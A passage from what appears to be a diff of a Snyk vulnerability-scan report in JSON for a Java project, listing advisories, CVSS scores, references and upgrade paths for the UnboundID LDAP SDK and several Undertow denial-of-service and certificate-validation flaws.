"commons-collections:commons-collections@3.1" - ], - "upgradePath": [ - false, - "commons-collections:commons-collections@3.2.2" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "commons-collections:commons-collections", - "version": "3.1" - }, - { - "id": "SNYK-JAVA-COMUNBOUNDID-32143", - "title": "User Impersonation", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,4.0.5)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "4.0.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [ - { - "version": [ - "[,4.0.5)" - ], - "functionId": { - "filePath": "com/unboundid/ldap/sdk/SimpleBindRequest.java", - "className": "SimpleBindRequest", - "functionName": "process" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.unboundid:unboundid-ldapsdk", - "references": [ - { - "url": "https://github.com/pingidentity/ldapsdk/commit/8471904a02438c03965d21367890276bc25fa5a6", - "title": "GitHub Commit" - }, - { - "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000134", - "title": "NVD" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1557531", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:19.854962Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 7, - "modificationTime": "2024-03-11T09:49:40.956024Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:02:05.592817Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:47:19.854962Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:49:40.956024Z" - } - ], - "description": "## Overview\r\n[com.unboundid:unboundid-ldapsdk](https://github.com/pingidentity/ldapsdk) is a UnboundID LDAP SDK for Java.\r\n\r\nAffected version of this package are vulnerable to User Impersonation. The process function in the `SimpleBindRequest` class which check for empty password when running in synchronous mode.\r\n\r\n## Remediation\r\nUpgrade `com.unboundid:unboundid-ldapsdk` to version 4.0.5 or higher.\r\n\r\n## References\r\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1557531)\r\n- [NVD](https://nvd.nist.gov/vuln/detail/CVE-2018-1000134)\r\n- [GitHub Commit](https://github.com/pingidentity/ldapsdk/commit/8471904a02438c03965d21367890276bc25fa5a6)", - "epssDetails": { - "percentile": "0.80907", - "probability": "0.00729", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-1000134" - ], - "CWE": [ - "CWE-284" - ] - }, - "packageName": "com.unboundid:unboundid-ldapsdk", - "proprietary": false, - "creationTime": "2018-03-16T00:00:00Z", - "functions_new": [ - { - "version": [ - "[,4.0.5)" - ], - "functionId": { - "className": "com.unboundid.ldap.sdk.SimpleBindRequest", - "functionName": "process" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-03-16T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.unboundid", - "artifactId": "unboundid-ldapsdk" - }, - "publicationTime": "2018-04-01T14:18:00Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:49:40.956024Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "com.unboundid:unboundid-ldapsdk@3.1.1" - ], - "upgradePath": [ - false, - "com.unboundid:unboundid-ldapsdk@4.0.5" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.unboundid:unboundid-ldapsdk", - "version": "3.1.1" - }, - { - "id": "SNYK-JAVA-IOUNDERTOW-2391283", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,2.2.15.Final)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.2.15.Final" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "io.undertow:undertow-core", - "references": [ - { - "url": "https://github.com/undertow-io/undertow/commit/db0f5be43f8e2a4b88fbedd2eb6d5a95a29ceaa8", - "title": "Github Commit" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2010378", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:49:50.428787Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:48.070223Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:10.356697Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:50.428787Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:48.070223Z" - } - ], - "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) which would cause client side invocation timeout with certain calls made over HTTP2.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.15.Final or higher.\n## References\n- [Github Commit](https://github.com/undertow-io/undertow/commit/db0f5be43f8e2a4b88fbedd2eb6d5a95a29ceaa8)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2010378)\n", - "epssDetails": { - "percentile": "0.78402", - "probability": "0.00590", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-3859" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "io.undertow:undertow-core", - "proprietary": false, - "creationTime": "2022-02-02T11:20:49.957629Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-02-01T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "io.undertow", - "artifactId": "undertow-core" - }, - "publicationTime": "2022-02-09T17:20:22.376852Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:48.070223Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "io.undertow:undertow-core@2.2.13.Final" - ], - "upgradePath": [ - false, - "io.undertow:undertow-core@2.2.15.Final" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "io.undertow:undertow-core", - "version": "2.2.13.Final" - }, - { - "id": "SNYK-JAVA-IOUNDERTOW-2871356", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.2.19.Final)", - "[2.3.0.Alpha1,2.3.0.Alpha2)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.2.19.Final", - "2.3.0.Alpha2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "io.undertow:undertow-core", - "references": [ - { - "url": "https://github.com/undertow-io/undertow/commit/7d3a045da0fa4e4f3f6c4af145b87c7c15581748", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/undertow-io/undertow/pull/1350/commits/2825b026d767f28ddbbeb7abec510c6cec2f5a54", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/undertow-io/undertow/pull/1350", - "title": "GitHub PR" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2095862", - "title": "Red Hat Bugzilla Bug" - }, - { - "url": "https://issues.redhat.com/browse/UNDERTOW-2133", - "title": "Undertow Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:49:53.809517Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:54:00.519226Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:09.755888Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:53.809517Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:54:00.519226Z" - } - ], - "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) when a `POST` request comes through `AJP` and the request exceeds the `max-post-size` limit (`maxEntitySize`). The `AjpServerRequestConduit` implementation closes a connection without sending any response to the `client/proxy` which will result in a front-end proxy marking the backend worker as an error state and not forward requests to the worker for a while.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.19.Final, 2.3.0.Alpha2 or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/7d3a045da0fa4e4f3f6c4af145b87c7c15581748)\n- [GitHub Commit](https://github.com/undertow-io/undertow/pull/1350/commits/2825b026d767f28ddbbeb7abec510c6cec2f5a54)\n- [GitHub PR](https://github.com/undertow-io/undertow/pull/1350)\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2095862)\n- [Undertow Issue](https://issues.redhat.com/browse/UNDERTOW-2133)\n", - "epssDetails": { - "percentile": "0.36318", - "probability": "0.00084", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-2053" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "io.undertow:undertow-core", - "proprietary": false, - "creationTime": "2022-06-15T13:53:50.957525Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-06-14T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "io.undertow", - "artifactId": "undertow-core" - }, - "publicationTime": "2022-06-15T15:07:37Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:54:00.519226Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "io.undertow:undertow-core@2.2.13.Final" - ], - "upgradePath": [ - false, - "io.undertow:undertow-core@2.2.19.Final" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "io.undertow:undertow-core", - "version": "2.2.13.Final" - }, - { - "id": "SNYK-JAVA-IOUNDERTOW-3012383", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.2.18)", - "[2.3.0.Alpha1,2.3.0.Alpha2)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.2.18", - "2.3.0.Alpha2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "io.undertow:undertow-core", - "references": [ - { - "url": "https://github.com/undertow-io/undertow/commit/1443a1a2bbb8e32e56788109d8285db250d55c8b", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/undertow-io/undertow/commit/7c5b3ab885b5638fd3f1e8a935d5063d68aa2df3", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/undertow-io/undertow/pull/1331", - "title": "GitHub PR" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2073890", - "title": "Red Hat Bugzilla Bug" - }, - { - "url": "https://issues.redhat.com/browse/UNDERTOW-2060", - "title": "Red Hat Issues" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:50:01.171825Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:47.199026Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:06:56.623925Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:01.171825Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:47.199026Z" - } - ], - "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) via an AJP 400 response, when EAP 7 is improperly sending two response packets, those packets have the reuse flag set even though JBoss EAP closes the connection. A failure occurs when the connection is reused after a 400 by `CPING` since it reads in the second `SEND_HEADERS` response packet instead of a `CPONG`.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.18, 2.3.0.Alpha2 or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/1443a1a2bbb8e32e56788109d8285db250d55c8b)\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/7c5b3ab885b5638fd3f1e8a935d5063d68aa2df3)\n- [GitHub PR](https://github.com/undertow-io/undertow/pull/1331)\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2073890)\n- [Red Hat Issues](https://issues.redhat.com/browse/UNDERTOW-2060)\n", - "epssDetails": { - "percentile": "0.71500", - "probability": "0.00335", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-1319" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "io.undertow:undertow-core", - "proprietary": false, - "creationTime": "2022-08-31T17:18:28.761846Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-08-31T17:13:48Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "io.undertow", - "artifactId": "undertow-core" - }, - "publicationTime": "2022-08-31T17:18:28Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:47.199026Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "io.undertow:undertow-core@2.2.13.Final" - ], - "upgradePath": [ - false, - "io.undertow:undertow-core@2.2.18.Final" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "io.undertow:undertow-core", - "version": "2.2.13.Final" - }, - { - "id": "SNYK-JAVA-IOUNDERTOW-3339519", - "title": "Improper Certificate Validation", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,2.2.24.Final)", - "[2.3.0.Alpha1,2.3.5.Final)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.2.24.Final", - "2.3.5.Final" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "io.undertow:undertow-core", - "references": [ - { - "url": "https://github.com/undertow-io/undertow/commit/a4d3b167126a803cc4f7fb740dd9a6ecabf59342", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/undertow-io/undertow/commit/e5071e52b72529a14d3ec436ae7102cea5d918c4", - "title": "GitHub Commit" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2153260", - "title": "RedHat Bugzilla Bug" - }, - { - "url": "https://access.redhat.com/security/cve/CVE-2022-4492", - "title": "RedHat CVE Database" - }, - { - "url": "https://issues.redhat.com/browse/MTA-93", - "title": "RedHat Issues" - }, - { - "url": "https://github.com/undertow-io/undertow/blob/master/core/src/main/java/io/undertow/security/impl/ClientCertAuthenticationMechanism.java", - "title": "Vulnerable Code" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:52:58.198807Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:54:00.706455Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:39.172740Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:58.198807Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:54:00.706455Z" - } - ], - "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Improper Certificate Validation via the undertow client which does not check the server identity presented by the server certificate in https connections.\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.24.Final, 2.3.5.Final or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/a4d3b167126a803cc4f7fb740dd9a6ecabf59342)\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/e5071e52b72529a14d3ec436ae7102cea5d918c4)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2153260)\n- [RedHat CVE Database](https://access.redhat.com/security/cve/CVE-2022-4492)\n- [RedHat Issues](https://issues.redhat.com/browse/MTA-93)\n- [Vulnerable Code](https://github.com/undertow-io/undertow/blob/master/core/src/main/java/io/undertow/security/impl/ClientCertAuthenticationMechanism.java)\n", - "epssDetails": { - "percentile": "0.35043", - "probability": "0.00081", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-4492" - ], - "CWE": [ - "CWE-295" - ], - "GHSA": [ - "GHSA-pfcc-3g6r-8rg8" - ] - }, - "packageName": "io.undertow:undertow-core", - "proprietary": false, - "creationTime": "2023-03-05T09:49:05.782717Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2023-02-23T21:30:16Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "io.undertow", - "artifactId": "undertow-core" - }, - "publicationTime": "2023-03-05T09:49:05.974241Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:54:00.706455Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "io.undertow:undertow-core@2.2.13.Final" - ], - "upgradePath": [ - false, - "io.undertow:undertow-core@2.2.24.Final" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "io.undertow:undertow-core", - "version": "2.2.13.Final" - }, - { - "id": "SNYK-JAVA-IOUNDERTOW-3358786", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,2.2.25.Final)", - "[2.3.0.Alpha1,2.3.6.Final)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.2.25.Final", - "2.3.6.Final" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "io.undertow:undertow-core", - "references": [ - { - "url": "https://github.com/undertow-io/undertow/commit/f73e724ab39567e889a6f453aadf520953f3b4ef", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/undertow-io/undertow/pull/1477", - "title": "GitHub PR" - }, - { - "url": "https://issues.redhat.com/browse/UNDERTOW-2137", - "title": "Undertow Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:50:01.060024Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:54:00.539446Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:20.874470Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:01.060024Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:54:00.539446Z" - } - ], - "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in flow control handling by the browser over HTTP/2. This may cause overhead or a denial of service in the server. This is due to an incomplete fix of [CVE-2021-3629](https://security.snyk.io/vuln/SNYK-JAVA-IOUNDERTOW-2847922).\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending 